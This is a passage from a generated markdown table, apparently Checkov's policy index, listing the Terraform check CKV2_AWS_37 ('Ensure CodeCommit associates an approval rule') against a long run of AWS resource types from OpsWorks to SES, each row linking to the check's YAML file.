[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1262 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1263 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1264 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1265 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1266 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1267 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1268 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1269 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1270 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1271 | CKV2_AWS_37 | resource | 
aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1272 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1273 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1274 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1275 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1276 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1277 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1278 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1279 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1280 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1281 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1282 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1283 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1284 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1285 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1286 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1287 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1288 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1289 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1290 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1291 | CKV2_AWS_37 | 
resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1292 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1293 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1294 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1295 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1296 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1297 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1298 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1299 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1300 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1301 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1302 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1303 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1304 | CKV2_AWS_37 | 
resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1305 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1306 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1307 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1308 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1309 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1310 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
1311 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1312 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1313 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1314 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1315 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1316 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1317 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1318 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1319 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1320 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1321 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1322 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1323 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1324 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1325 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1326 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1327 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1328 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1329 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1330 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1331 | 
CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1332 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1333 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1334 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1335 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1336 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1337 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1338 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1339 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1340 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1341 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1342 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1343 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1344 | CKV2_AWS_37 | resource | 
aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1345 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1346 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1347 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1348 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1349 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1350 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1351 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1352 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1353 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1354 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1355 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1356 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1357 | CKV2_AWS_37 | resource | 
aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1358 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1359 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1360 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1361 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1362 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1363 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | 
